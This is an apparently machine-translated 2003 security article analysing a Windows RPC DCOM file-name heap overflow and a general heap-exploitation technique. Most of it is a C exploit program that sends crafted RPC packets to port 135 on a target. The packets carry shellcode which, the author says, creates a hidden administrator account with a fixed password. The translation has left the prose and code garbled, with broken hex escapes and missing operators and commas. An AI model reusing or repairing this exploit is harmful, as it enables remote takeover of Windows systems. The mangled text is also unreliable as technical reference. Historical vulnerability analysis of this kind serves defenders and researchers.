RPC file name length Pile overflow analysis and some discovery of its versatility stack overflow attack
Created: 2003-09-20 Updated: 2003-09-21
Article attribute: original
Article submission:
Flashsky (Flashsky1_at_sina.com)
RPC file name length Pile overflow analysis and some discovery of its versatility stack overflow attack
Please note the author and security focus, Queen Chen Company
Author: FLASHSKY
Site:
Www.xfocus.net,
Www.venustech.com.cn
Www.shopsky.com
Email: Flashsky@xfocus.org
Author: Qi Mingxing Active Defense Laboratory
Thanks to: EYAS Discussion on Winsocket Using Heap. English translation and technical discussion of Eyas @ Xfocus.org, Benjurry, Benjurry @ Xfocus.org
I would like to thank all the members of Xfocus and the support and help of the Positive Defense of the Laboratory of Xfocus.
1. RPC file name Remote Pileup Problem Location
RPC DCOM file name stack is actually consistent with the local overflow interface in the last LSD overflow, just one is a stack of one is a heap, which can be triggered by the stack overflow.
Trigger principle:
RPC DCOM checks the server name in the UNC. If the server is named NetBIOS name, IP, localhost, 127.0.0.1 will resolve the filename after the file is resolved.
The problem code is as follows:
.TEXT: 76151469 PUSH 20AH
.text: 7615146e Push EDI
.TEXT: 7615146F Push HHEAP
.text: 76151475 Call allocheap <----------------- only assigned a pile of 0x20a
.Text: 7615147B Mov Edi, EAX
.TEXT: 7615147D Test EDI, EDI
.TEXT: 7615147F JNZ Short Loc_76151491
.TEXT: 76151481 PUSH [EBP HMEM]; HMEM
.text: 76151484 Call DS: Localfree
.TEXT: 7615148A
.TEXT: 7615148A LOC_7615148A:; CODE XREF: SUB_761513C5 4BJ
.TEXT: 7615148A MOV EAX, 8007000EH
.TEXT: 7615148F JMP Short Loc_761514B9
.text: 76151491; Where is Xomotice? Where is Xiyomo? Where is Xomiyo?
.TEXT: 76151491
.TEXT: 76151491 LOC_76151491:; Code Xref: SUB_761513C5 Baj
.TEXT: 76151491 MOV EAX, [EBP HMEM]
.TEXT: 76151494 Push DWORD PTR [EAX 18H]; lpstring2
.Text: 76151497 Push EDI; LPSTRING1.TEXT: 76151498 CALL DS: LSTRCPYW
.TEXT: 7615149E Push ESI; LPSTRING2
.TEXT: 7615149F Push EDI; LPSTRING1
.TEXT: 761514A0 MOV [ESI], BX
.text: 761514A3 Call DS: LSTRCATW "-------- use lstrcat to admit the name of our file, not long detection, resulting in overflow,
Due to use LSTRCAT, you can't bring 0x00,0x00 in the shellcode double byte.
2. Generality stack overflow attack ideas
By covering the reactor management structure, you can overwrite some SEH or function return addresses to get control permissions, but the stack overflow has always been recognized. Universal utilization.
Because of the most troublesome of Heap overflow attacks is the positioning of shellcode. Because the pile address is not fixed, there is almost no accumulator and known memory after obtaining control permissions.
The address of the guide buffer cannot be able to obtain the call address through opcode such as JMP ESP, then we really don't work? The answer is NO.
When the normal heap management structure, the contents and operations of the heap are as follows:
Release the contents: addr1 addr2
Operation: MOV [Addr2], Addr1
MOV [Addr1 4], AddR2
When this time, the addr2 is changed to the address of a certain abnormal structure in SEH, and addr1 is the address of our shellcode, we can get an exception
Permissions. But how to position shellcode?
In fact, through research, we have found that the following effects are produced when constructing a specific heap management structure:
Suppose addr3 is the superior pile of addr1
Release the contents: addr1 addr2
Action: MOV [Addr2], Addr3
MOV [addr3], addr1
MOV [Addr3 4], AddR2
OK, because addr3 is the system through mechanism to position, through this mechanism, we can execute the address of Addr3 when he is abnormal, but addr3
The content within the site we assume that we can't control it, but due to MOV [Addr3], Addr1, we can change the first 8 heads you can control through Addr1, this is enough, we can completely
To use him to implement JMP, jump to our true shellcode, the size between the ADDR3 and ADDR1 is fixed, and the specific pile overflow is fixed, and can also be used through a large number of NOPs.
Violence expands this area, so as long as we can construct such a heap management structure, we can say that universal implementation of the stack overflow attack is feasible. At least we found that in the RPC long file name stack overflow
Such a heap management structure in the middle structure is feasible to achieve this universal pile over attack. Moreover, it is existed in the test of W2KSP3, SP4, and constructing this heap management structure.
The specific mechanism of the universal generalization refers to "Windows Release Stack Structure Coverage and Universal Stack Overflow".
Note: In fact, the HDM EXP also uses this method, but he is still not easy to succeed because he does not deal with the abnormal problems after confusion. 3. RPC pile over attack implementation
In fact, it is very early, and RPC is overflow, I solved the problem of shellcode positioning, but it has been dealt with another problem, that is, after the heap management structure is destroyed, we will always be abnormal, especially when shellcode executes in calling API.
The W2K SP4 MS03-26 patch's system is above, and the method of solving the following is to replace the default heap of the system in the PEB using a stack in the system:
Mov Eax, FS: [0x00000018] <--------- PEB Address
Mov Eax, [EAX 0x30]
Lea Eax, [EAX 0x18] <-------- get the process default Heap base address
Mov ebx, 0x170000
MOV [EAX], EBX <----------- Replace 0x170000
Note that the 0x170000 here is only valid for CN 2K SP4 MS03-26. If you want to be more common, you can use HeapCreate to create a new pile in shellcode, then replace it.
######################################################################################################################################################################################################################################################################################################## #######
This part is derived from Eyas research, Eyas @ Xfocus.org
In addition:
Since Winsocket is called GHEAP, this part is specified as the process default heap address when DLL initialization, so he will have a heap of abnormality when calling Winsocket. General recommendations are not used.
Winsock's shellcode, or his own shellcode to search for GHEAP variables, then call the API (Since the address in GHEAP may not be fixed to all versions, this may lose versatility).
######################################################################################################################################################################################################################################################################################################## #######
I started using Winsocket's shellcode, which is the reason for the replacement of the default Heap Base.
Later, after the "Windows Release Stack Structure Coverage and Universal Stack Overflow", it is found that there is still another way to use the API does not cause the heap unusual method to restore the Heap Free List structure, due to the destroyed main It is the structure of the release of the heap, and the chain list can be removed, restore into a normal release stack table, which is more common and can be used with any API, but the code of shellcode is more complicated, and there is no longer given an example.
(Description: Specific Mechanism Reference "Windows Release Stack Structure Coverage and Universal Stack Overflow" Then take him into a normal listing. Everyone studys clearly, which is clear, combined with the picture, this is not difficult, and it can be very common.
As long as the next table points to this table is equal to the previous table points to the next table, you can judge where we can overwrite, and then simply point the pointer of the last normal next linked list to the head of Free Heap List. Solved), or directly point the contents of this chain head to the linked table, representing the chain list is empty.
Received:
The following is given the code version of such a HEAP overflow:
Since the hazard of worm makers and script, the following code given is not very common version, but according to the technical details and methods given earlier, people who know how to write more general and powerful code themselves. For the system:
W2K SP3 MS03-26
W2K SP4 MS03-26
Addr1: / XEB / X1E / X08 / X00
This address is implemented is JMP 1E jumps to true shellcode
Addr3: addr3 is actually in the RPC is actually the number of servers named by the previous UNC path, which can be derived that JMP 1e is on our shellcode.
This mechanism is common for W2K Server SP3 / SP4 MS03-26.
SP4 successful chances, SP3 is sometimes not in the login state, because the rear covered stack is not in the released list. In the subsequent article, we will continue to discuss how to control the state of the stack through our happly, manufacture such a release, more common use of this vulnerability.
It should be noted that the value of SEH needs to be modified according to different systems.
Shellcode is an additional user SST, password 557, administrator user group
/ *
RPCDCOM2.C VER1.1
Copy by Flashsky
* /
#include
#include
#include
#include
#include
#include
Unsigned char bindstr [] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x7f, 0x00, 0x00, 0x00,
0xD0, 0x16, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xA0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00};
Unsigned char request1 [] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xe8, 0x03
0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x05, 0x00
0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x32, 0x24, 0x58, 0xfd, 0xcc, 0x45
0x64, 0x49, 0xB0, 0X70, 0X2C, 0xAe, 0x74, 0x2c, 0x96, 0x0d, 0x60, 0x5e, 0x0d, 0x00, 0x01,0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x5e, 0x0d, 0x00, 0x02, 0x00, 0x00, 0x00, 0x7c, 0x5e
0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x80, 0x96, 0xF1, 0xF1, 0x2a, 0x4d
0xCE, 0x11, 0xA6, 0x6a, 0x00, 0x20, 0xAf, 0x6e, 0x72, 0xF4, 0x0c, 0x00, 0x00, 0x00, 0x42, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 0x00, 0x0d, 0xF0, 0xAD, 0xBA, 0x00, 0x00
0x00, 0x00, 0xA8, 0xF4, 0x0b, 0x00, 0x60, 0x03, 0x00, 0x00, 0x60, 0x03, 0x00, 0x00, 0x4d, 0x45
0x4F, 0x57, 0x04, 0x00, 0x00, 0x00, 0xa2, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00
0x00, 0x00, 0x00, 0x38, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x03, 0x00, 0x00, 0x28, 0x03
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0xc8, 0x00
0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x28, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc4, 0x28, 0xcd, 0x00, 0x64, 0x29
, 0xcd, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB9, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xAb, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa5, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa6, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa4, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xAD, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0XAA, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x07, 0x00, 0x00, 0x00, 0x60, 0x00
0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x20, 0x00
0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x50, 0x00, 0x00, 0x00, 0x4f, 0xB6, 0x88, 0x20, 0xFF, 0xFF
0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x48, 0x00, 0x00, 0x00, 0x07, 0x00, 0x66, 0x00, 0x06, 0x09
0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x10, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x78, 0x19, 0x0c, 0x00, 0x58, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x01, 0x00
0x00, 0x00, 0x70, 0xD8, 0x98, 0x93, 0x98, 0x4F, 0xD2, 0X11, 0XA9, 0X3D, 0XBE, 0X57, 0XB2, 0X00
0x00, 0x00, 0x32, 0x00, 0x31, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x80, 0x00
0x00, 0x00, 0x0d, 0xF0, 0xAD, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x18, 0x43, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00
0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0xc0, 0x01
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x3b, 0x03
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00
0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x81, 0xc5, 0x17, 0x03, 0x80, 0x0e
0x99, 0x4a, 0x99, 0x99, 0xf1, 0x8a, 0x50, 0x6f, 0x7a, 0x85, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x30, 0x00
0x00, 0x00, 0x78, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDa, 0x0d, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x20, 0x2f, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 0x00, 0x03, 0x00, 0x00, 0x00, 0x46, 0x00
0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x10, 0x00
0x00, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x68, 0x00
0x00, 0x00, 0x0e, 0x00, 0xff, 0xff, 0x68, 0x8b, 0x0b, 0x00, 0x02,0x00,0x00,0x00,0x00,0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
UNSIGNED Char Request2 [] = {
0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00
0x00, 0x00, 0x5c, 0x00, 0x5c, 0x00};
UNSIGNED Char Request3 [] = {
0x46, 0x00, 0x43, 0x00, 0x24, 0x00, 0x46, 0x00,
0x31, 0x00, 0x32, 0x00, 0x33, 0x00, 0x34, 0x00, 0x35, 0x00
0x36, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x31, 0x00, 0x31, 0x00
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00
0x2e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x00, 0x00};
Unsigned char sccnsp3sp3sp4 [] =
"/ x6c / x00 / x00 / x61 / x00 / x6c / x00 / x68 / x00"
"/ x6f / x00 / x00 / x5c / x00 / x43 / x00 / x24 / x00 / x5c / x00"
"/ x58 / x00 / x00 / x46 / x00 / Xeb / x7c / x46 / x00 / x46 / x00 / x38 / x6e"
"/ XEB / X02 / XEB / X05 / XE8 / XF9 / XFF / XFF / XFF / X58 / X83 / XC0 / X1B / X8D / XA0 / X01"
"/ XEB / X1E / XFF / X83 / XE4 / XFC / X8B / XEC / X33 / X99 / X01 / X80 / X30"
"/ XF6 / XE0 / XE0 / X93 / XDF / XFC / XF2 / XF7 / XEB / X06 / XF1 / XE1 / XD2"
// Shellcode Add User SST, password 557, user group of Administrator
"/ XEB / X10 / XC9 / X66 / XB9 / X4D / X01 / X80 / X34 / X0A / X99 / XE2 / XFA"
"/ Xeb / X05 / XE8 / XEB / XFF / XFF / XFF"
"/ x70 / x99 / xcc / x12 / x75 / x18 / x99 / x19 / x99 / x99 / x99 / x12 / x6d"
"/ x71 / x92 / x98 / x9f / x66 / xaf / xf1 / x01 / x67 / x13 / x97 / x71 / x3c" "/ x99 / x99 / x99 / x10 / xdf / x95 / x66 / XAF / XF1 / XE7 / X41 / X7B / XEA / X71 / X0F / X99 ""
"/ x99 / x99 / x10 / xdf / x89 / xfd / x38 / x81 / x99 / x99 / x99 / x12 / xd9 / xa9 / x14 / xd9"
"/ x81 / x22 / x99 / x10 / x81 / xaa / x59 / xc9 / xf3 / xfd / xf1 / xb9 / xb6"
"/ XF8 / XFD / XF1 / XB9 / XEA / XEA / XED / XF1 / XEC / XEA / XFC / XEB / XEC / XF7 / XFC / XED"
"/ XB9 / X12 / X55 / XC9 / XC8 / X66 / XCF / X95 / XAA / X59 / XC9 / XF1 / XB9 / XAC / XAC / XAE"
"/ XF1 / XB9 / XEA / XEA / XED / XED / XEC / XEA / XFC / XEB / XF1 / XF7 / XFC / XED / XB9 / X12"
"/ X55 / XC9 / XC8 / X66 / XCF / X95 / XAA / X59 / XC9 / XF1 / XFD / XFD / X99 / X99 / XF1 / XED"
"/ XB9 / XB6 / XF8 / XF1 / XEA / XB9 / XEA / XEA / XF1 / XF8 / XED / XF6 / XEB / XF1 / XF0 / XEA"
"/ XED / XEB / XF1 / XFD / XF4 / XF0 / XF7 / XF1 / XEC / XE9 / XB9 / XF8 / XF1 / XF5 / XFE / XEB"
"/ XF6 / XF1 / XF5 / XF6 / XFA / XF8 / XF1 / XF7 / XFC / XED / XB9 / X12 / X55 / XC9 / XC8 / X66"
"/ XCF / X95 / XAA / X59 / XC9 / X66 / XCF / X89 / XCA / XCC / XCF / XCE / X12 / XF5 / XBD / X81"
"/ X12 / XDC / XA5 / X12 / XCD / X9C / XE1 / X9A / X4C / X12 / XD3 / X81 / X12 / XC3 / XB9 / X9A"
"/ x44 / x7a / xab / xd0 / x12 / xad / x12 / x9a / x6c / xaa / x66 / x65 / xaa / x59 / x35 / xa3"
"/ X5D / XED / X9E / X58 / X56 / X72 / X6B / XA2 / XE5 / XBD / X8D / XEC / X78"
"/ X12 / XC3 / XBD / X9A / X44 / XFF / X12 / X95 / XD2 / X12 / XC3 / X85 / X9A / X44 / X12 / X9D"
"/ x12 / x9b / x5c / x59 / x12 / x4c / xc6 / xc7 / xc4 / xc2 / x5b / x9d / x99"
"/ XCC / XCF / XFD / X38 / XA9 / X99 / X99 / X99 / X1C / X59 / XE1 / X95 / X12 / XD9 / X95 / X12"
"/ XE9 / X85 / X34 / X12 / X90 / X12 / XD9 / XAD / X12 / X31 / X21 / X99 / X99"
"/ x99 / x12 / x5c / xc7 / xc4 / x5b / x9d / x99 / x71 / x21 / x67 / x66 / x66"
"/ x6e / x60 / x38 / xcc / x54 / xd6 / x93 / xd7 / x93 / x 293 / x93 / x1a / xce / xaf / x1a / XCE"
"/ XAb / X1A / XCE / XD3 / X54 / XD6 / XBF / X92 / X92 / X93 / X93 / X1E / XD6 / XD7 / XC3 / XC6"
"/ XC2 / XC2 / XC2 / XD2 / XC2 / XDA / XC2 / XC2 / XC5 / XC2 / X6C / XC4 / X77 / X6C / XE6 / XD7"
"/ X6C / XC4 / X7B / X6C / XE6 / XDB / XD / X6C / XC4 / X6B / XC3 / X6C / XC4" "/ X7F / X19 / X95 / XD5 / X17 / X53 / XE6 / X6A "
"/ XC2 / XC1 / XC5 / XC0 / X6C / X41 / XC9 / XCA"
"/ x1a / x94 / xd4 / xd4 / xd4 / xd4 / x71 / x7a / x50 / x90 / x90 / x90" //
"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"
"/ X77 / XE0 / X43 / X00 / X00 / X10 / X5C / X00"
"/ XEB / X1E / X01 / X00" // for CN SP3 / SP4 -MS03-26
"/ x4c / x14 / xec / x77" // Top SEH for CN W2K SP4, replacement into your SEH
// Fill, to ensure UNC Path Len> 0x80 * 8 = 0x400, this is to use a large object to handle it, the principle refers to my "Windows released stack structure coverage and universal stack overflow"
// General method Reference My "Windows released stack structure coverage and universal stack overflow"
"/ XEB / X10 / X5A / X4A / X33 / XC9 / X66 / XB9 / X90 / X02 / X80 / X34 / X0A / X99 / XE2 / XFA"
"/ Xeb / X05 / XE8 / XEB / XFF / XFF / XFF"
"/ XC7 / X5F / X9D / XBD / XDD / X14 / XDD / XBD / XDD / XC9 / X14 / XDD / XBD / X9D / XC9 / X14"
"/ X1D / XBD / X1D / X99 / X99 / X99 / XC9 / X14 / X1D / XBD / X0D / X99 / X99 / X99 / XC9 / XAA"
"/ X59 / XC9 / XC9 / XC9 / XC9 / XCA / X14 / X1D / XBD / X2D / X99 / X99 / X99 / XC9 / X66 / XCF"
"/ X95 / X14 / XD5 / XBD / XDD / X14 / X8D / XBD / XAA / X59 / XC9 / XF1 / XAC / X99 / XAE / X99"
"/ XF1 / XB9 / X99 / XAC / X99 / XED / X99 / XF1 / XB9 / X99 / XEA / X99 / XF1"
"/ XFC / X99 / XEB / X99 / XEA / X99 / XF1 / XED / X99 / XB9 / X99 / XF1 / XF7"
"/ X99 / XFC / X99 / X12 / X45 / XC8 / XCB / XC8 / XCB / X14 / X1D / XBD / X29 / X99 / X99 / X99"
"/ xc9 / x14 / x99 / x99 / x99 / xc9 / xaa / x59 / xc9 / xc9 / xc9 / xc9 / xca"
"/ x14 / x1d / x99 / x99 / xc9 / x66 / xcf / x95 / xc3 / xc0 / xaa / x59 / xc9"
"/ XF1 / XFD / X99 / XFD / X99 / XF1 / XB6 / X99 / XF8 / X99 / XF1 / XED / X99 / XB9 / X99 / XF1"
"/ XEA / X99 / XEA / X99 / XF1 / XEA / X99 / XB9 / X99 / XF1 / XF6 / X99 / XEB / X99 / XF1 / XF8"
"/ X99 / XED / X99 / XEB / X99 / XF1 / XF0 / X99 / XEA / X99 / XF1 / XF0 / X99"
"/ XF7 / X99 / XF1 / XFD / X99 / XB9 / X99 / XF8 / X99 / XF1 / XEC / X99 / XE9"
"/ x99 / xf1 / x99 / x99 / xf5 / x99 / xfe / x99 / xf1 / xfa / x99 / xf8 / x99" "/ xf1 / xf5 / x99 / xf6 / x99 / xf1 / xed / X99 / XB9 / X99 / XF1 / XF7 / X99 / XFC / X99 / X12 "
"/ X45 / XC8 / XCB / X14 / X1D / XBD / X61 / X99 / X99 / X99 / XC9 / X14 / X1D / XBD / X91 / X98"
"/ X99 / X99 / XC9 / XAA / XC9 / XC9 / XCA / X14 / X1D / XBD / XB1 / X98 / X99"
"/ X99 / XC9 / X66 / XCF / X95 / XAA / X59 / XC9 / X66 / XCF / X89 / XCA / XCC / XCF / XCE / X12"
"/ XF5 / XBD / X81 / X12 / XDC / XA5 / X12 / XCD / X9C / XE1 / X9A / X4C / X12 / XD3 / X81 / X12"
"/ xc3 / xb9 / x9a / x44 / x7a / xab / xd0 / x12 / xad / x12 / x9a / x6c / xaa / x66 / x65 / xaa"
"/ x59 / x35 / xa3 / x5d / xed / x9e / x58 / x56 / x94 / x9a / x61 / x72 / x6b / xa2 / xe5 / xbd"
"/ X8D / XEC / X78 / X12 / XC3 / XBD / X9A / X44 / XFF / X12 / X95 / XD2 / X12 / XC3 / X85 / X9A"
"/ x44 / x12 / x9d / x12 / x9a / x5c / x72 / x9b / xaa / x59 / x12 / x4c / xc6 / xc7 / xc4 / xc2"
"/ X5B / X9D / X99 / XCC / XCF / XFD / X38 / XA9 / X99 / X99 / X99 / X1C / X59 / XE1 / X95 / X12"
"/ XD9 / X95 / X34 / XE9 / X85 / X91 / X72 / X90 / X12 / XD9 / XAD / X12 / X31"
"/ x21 / x99 / x99 / x99 / x12 / x5c / xc7 / xc4 / x5b / x9d / x99 / x71 / xec / x64 / x66 / x66"
"/ x04 / x04 / x00 / x70 / x00 / x04 / x40"
"/ x00 / x10 / x5c / x00 / x78 / x01 / x07 / x00 / x00 / xa0 / x04 / x00"
"/ x21 / x99 / x99 / x99 / x12 / x5c / xc7 / xc4 / x5b / x9d / x99 / x71"
UNSIGNED Char Request4 [] = {
0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x20, 0x00, 0x00, 0x00, 0x30, 0x00, 0x2d, 0x00, 0x00, 0x00
0x00, 0x00, 0x88, 0x2a, 0x0c, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x8c
0x0c, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
}
Void main (int Argc, char ** argv)
{
Wsadata wsadata;
Socket sock;
INT LEN, LEN1;
SockAddr_in addr_in;
Short port = 135;
UNSIGNED Char BUF1 [0x1000];
UNSIGNED Char BUF2 [0x1000];
Printf ("RPC DCOM OVERFLOW Vulnerability Discoveried By NSFOCUS / N");
Printf ("Code By Flashsky, Flashsky Xfocus ORG / N); Printf (" Welcome to Our Site:
http://www.xfocus.org/n ");
Printf ("Welcome to Our Site:
http://www.venustech.com.cn/n ");
IF (argc! = 2)
{
Printf ("% s targetip / n", argv [0]);
Printf ("for CN W2K Server SP3 / SP4 MS03-26 / N");
}
IF (WsaStartup (MakeWord (2,0), & WSADATA)! = 0)
{
Printf ("WSAStartup Error.Error:% D / N", WsageTlasterror ());
Return;
}
Addr_in.sin_family = af_INet;
Addr_in.sin_port = htons (port);
Addr_in.sin_addr.s_un.s_addr = inet_addr (Argv [1]);
IF ((Sock = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == Invalid_socket
{
Printf ("socket failed.error:% d / n", wsagetlasterror ());
Return;
}
Len1 = SIZEOF (Request1);
Len = SizeOf (sccnsp3sp4);
IF (WSaconnect (STRUCKADDR *) & addr_in, sizeof (addr_in), null, null, null, null) == Socket_ERROR)
{
Printf ("Connect Failed. Error:% D", Wsagetlasterror ());
Return;
}
Memcpy (BUF2, Request1, Sizeof (Request1));
* (DWORD *) (Request2) = * (DWORD *) (Request2) SizeOf (sccnsp3sp4) / 2; // calculate file name double byte length
* (DWORD *) (Request2 8) = * (DWORD *) (Request2 8) sizeof (sccnsp3sp3s) / 2; // calculate file name double byte length
Memcpy (buf2 len1, request2, sizeof (request2));
LEN1 = LEN1 SIZEOF (Request2);
Memcpy (buf2 len1, sccnsp3sp4, sizeof (sccnsp3sp4));
LEN1 = LEN1 SIZEOF (sccnsp3sp4);
Memcpy (BUF2 LEN1, Request3, Sizeof (Request3));
LEN1 = LEN1 SIZEOF (Request3);
Memcpy (BUF2 LEN1, Request4, Sizeof (Request4));
LEN1 = LEN1 SIZEOF (Request4);
* (DWORD *) (BUF2 8) = * (DWORD *) (BUF2 8) LEN-0XC;
// Calculate the length of various structures
* (Dword *) (buf2 0x10) = * (dword *) (buf2 0x10) len-0xc;
* (DWORD *) (BUF2 0x80) = * (dword *) (buf2 0x80) len-0xc; * (dword *) (BUF2 0x84) = * (dword *) (BUF2 0x84) LEN- 0xc;
* (DWORD *) (BUF2 0xB4) = * (DWORD *) (BUF2 0xB4) LEN-0XC;
* (DWORD *) (BUF2 0xB8) = * (DWORD *) (BUF2 0xB8) LEN-0XC;
* (DWORD *) (BUF2 0xD0) = * (DWORD *) (BUF2 0xD0) LEN-0XC;
* (DWORD *) (BUF2 0x18C) = * (DWORD *) (BUF2 0x18C) LEN-0XC;
IF (SOND (SOCK, BINDSTR, SIZEOF (BINDSTR), 0) == Socket_ERROR)
{
Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());
Return;
}
Len = Recv (SOCK, BUF1, 1000, NULL);
IF (SEND (SOCK, BUF2, LEN1, 0) == Socket_ERROR)
{
Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());
Return;
}
// Len = RECV (SOCK, BUF1, 1024, NULL);
}
/ *
* /
